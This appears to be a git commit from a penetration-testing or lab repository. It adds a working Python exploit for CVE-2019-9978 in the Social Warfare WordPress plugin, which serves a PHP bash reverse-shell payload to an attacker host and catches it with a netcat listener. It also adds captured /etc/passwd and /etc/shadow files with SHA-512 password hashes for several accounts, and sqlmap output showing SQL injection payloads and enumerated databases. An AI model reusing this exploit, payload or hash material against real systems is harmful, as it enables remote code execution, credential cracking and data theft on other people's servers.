updates people updates

This commit is contained in:
2026-06-12 00:36:55 +02:00
parent a5e327d7f7
commit d90e4ede1a
17 changed files with 2462 additions and 216 deletions

View File

@@ -0,0 +1,31 @@
root:$6$mbIzpNIo$XElePqDmVNcUEhdU0nH1eQYvRvU1xQqQOM3F38Zceslqiz0tYTc1iAMxFXTt9TKlXsslPvLoLuMlE/n83iNce/:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:*:104:65534::/nonexistent:/bin/false
messagebus:*:105:109::/var/run/dbus:/bin/false
sshd:*:106:65534::/run/sshd:/usr/sbin/nologin
user:$6$RGsJnnEH$mma2lPBOwYMp.3JZ/8dhUW4LZ6Mxee2d52wUiQyxMNOXjzUY5PG.SvfmkriTdHgn5WX7OsBo2AOiPCEEMtTN1.:1000:1000:user,,,:/home/user:/bin/bash
mysql:!:107:111:MySQL Server,,,:/nonexistent:/bin/false
ftp:*:108:112:ftp daemon,,,:/srv/ftp:/bin/false
smmta:*:109:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:*:110:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
baldur:$6$/ScR4vLK$8XCAkPccvTAycL8fOxZagyk.vy54EqmdTcZQWQI.gzcygN6C5Iy35bMI65TZliwP6acrGpnhRBZKFrexoNGtu/:1001:1001::/home/baldur:

View File

@@ -0,0 +1,105 @@
#!/usr/bin/env python3
# Exploit Title: Social Warfare WordPress Plugin 3.5.2 - Remote Code Execution (RCE)
# Date: 25-06-2025
# Exploit Author: Huseyin Mardini (@housma)
# Original Researcher: Luka Sikic
# Original Exploit Author: hash3liZer
# Vendor Homepage: https://wordpress.org/plugins/social-warfare/
# Software Link: https://downloads.wordpress.org/plugin/social-warfare.3.5.2.zip
# Version: <= 3.5.2
# CVE: CVE-2019-9978
# Tested On: WordPress 5.1.1 with Social Warfare 3.5.2 (on Ubuntu 20.04)
# Python Version: Python 3.x
# Reference: https://www.exploit-db.com/exploits/46794
# Github (original PoC): https://github.com/hash3liZer/CVE-2019-9978
# The currently listed exploit for *CVE-2019-9978* (Exploit ID 46794<https://www.exploit-db.com/exploits/46794>) appears to no longer work as intended in many modern environments
# Usage:
# 1. Edit the config section below and replace `ATTACKER_IP` with your machine's IP.
# 2. Run the script: `python3 exploit.py`
# 3. It will:
# - Create a PHP payload and save it as `payload.txt` (or any filename you set in PAYLOAD_FILE)
# - Start an HTTP server on `HTTP_PORT` to host the payload
# - Start a Netcat listener on `LISTEN_PORT`
# - Trigger the vulnerability via the vulnerable `swp_debug` parameter
# 4. On success, you get a reverse shell as `www-data`.
#
# Note:
# - PAYLOAD_FILE defines only the name of the file to be created and served.
# - Make sure ports 8001 and 4444 are open and not in use.
import requests
import threading
import http.server
import socketserver
import os
import subprocess
import time
import random
# --- Config ---
TARGET_URL = "http://10.2.66.5/yggdrasil"
ATTACKER_IP = "10.1.0.172" # Change to your attack box IP
HTTP_PORT = 80
LISTEN_PORT = random.randint(40000,65555)
PAYLOAD_FILE = "payload.txt"
def create_payload():
"""Write exact reverse shell payload using valid PHP syntax"""
payload = f'<pre>system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")</pre>'
with open(PAYLOAD_FILE, "w") as f:
f.write(payload)
print(f"[+] Payload written to {PAYLOAD_FILE}")
def start_http_server():
"""Serve payload over HTTP"""
handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd:
print(f"[+] HTTP server running at port {HTTP_PORT}")
httpd.serve_forever()
def start_listener():
"""Start Netcat listener"""
print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...")
subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)])
def send_exploit():
"""Trigger the exploit with vulnerable parameter"""
payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}"
exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}"
print(f"[+] Sending exploit: {exploit}")
try:
requests.get(exploit, timeout=5)
except requests.exceptions.RequestException:
pass
def main():
create_payload()
# Start web server in background
http_thread = threading.Thread(target=start_http_server, daemon=True)
http_thread.start()
time.sleep(2) # Give server time to start
# Start listener in background
listener_thread = threading.Thread(target=start_listener)
listener_thread.start()
time.sleep(1)
# Send the malicious request
send_exploit()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("[-] Interrupted by user.")

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,31 @@
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:108:112:ftp daemon,,,:/srv/ftp:/bin/false
smmta:x:109:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:110:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
baldur:x:1001:1001::/home/baldur:

View File

@@ -0,0 +1,31 @@
root:$6$mbIzpNIo$XElePqDmVNcUEhdU0nH1eQYvRvU1xQqQOM3F38Zceslqiz0tYTc1iAMxFXTt9TKlXsslPvLoLuMlE/n83iNce/:20579:0:99999:7:::
daemon:*:17569:0:99999:7:::
bin:*:17569:0:99999:7:::
sys:*:17569:0:99999:7:::
sync:*:17569:0:99999:7:::
games:*:17569:0:99999:7:::
man:*:17569:0:99999:7:::
lp:*:17569:0:99999:7:::
mail:*:17569:0:99999:7:::
news:*:17569:0:99999:7:::
uucp:*:17569:0:99999:7:::
proxy:*:17569:0:99999:7:::
www-data:*:17569:0:99999:7:::
backup:*:17569:0:99999:7:::
list:*:17569:0:99999:7:::
irc:*:17569:0:99999:7:::
gnats:*:17569:0:99999:7:::
nobody:*:17569:0:99999:7:::
systemd-timesync:*:17569:0:99999:7:::
systemd-network:*:17569:0:99999:7:::
systemd-resolve:*:17569:0:99999:7:::
systemd-bus-proxy:*:17569:0:99999:7:::
_apt:*:17569:0:99999:7:::
messagebus:*:17569:0:99999:7:::
sshd:*:17569:0:99999:7:::
user:$6$RGsJnnEH$mma2lPBOwYMp.3JZ/8dhUW4LZ6Mxee2d52wUiQyxMNOXjzUY5PG.SvfmkriTdHgn5WX7OsBo2AOiPCEEMtTN1.:17569:0:99999:7:::
mysql:!:20579:0:99999:7:::
ftp:*:20579:0:99999:7:::
smmta:*:20579:0:99999:7:::
smmsp:*:20579:0:99999:7:::
baldur:$6$/ScR4vLK$8XCAkPccvTAycL8fOxZagyk.vy54EqmdTcZQWQI.gzcygN6C5Iy35bMI65TZliwP6acrGpnhRBZKFrexoNGtu/:20579:0:99999:7:::

View File

@@ -0,0 +1,37 @@
### sqlmap output
sqlmap identified the following injection point(s) with a total of 5599 HTTP(s) requests:
---
Parameter: product (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: product=-1399" OR 7840=7840-- CtiK
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: product=AUFB" AND (SELECT 9500 FROM (SELECT(SLEEP(5)))IiPL)-- CEjp
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: product=AUFB" UNION ALL SELECT NULL,CONCAT(0x716a626271,0x586a4443534a6c465264737464587149507541587a587945725a56796552544f5078416478545242,0x71717a7171)-- -
---
do you want to exploit this SQL injection? [Y/n] Y
[17:26:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:26:46] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/cato/.local/share/sqlmap/output/results-05082026_0524pm.csv'
available databases [4]:
[*] information_schema
[*] maindb
[*] mysql
[*] performance_schema
Database: maindb
[1 table]
+----------+
| products |
+----------+
current user: 'root@localhost'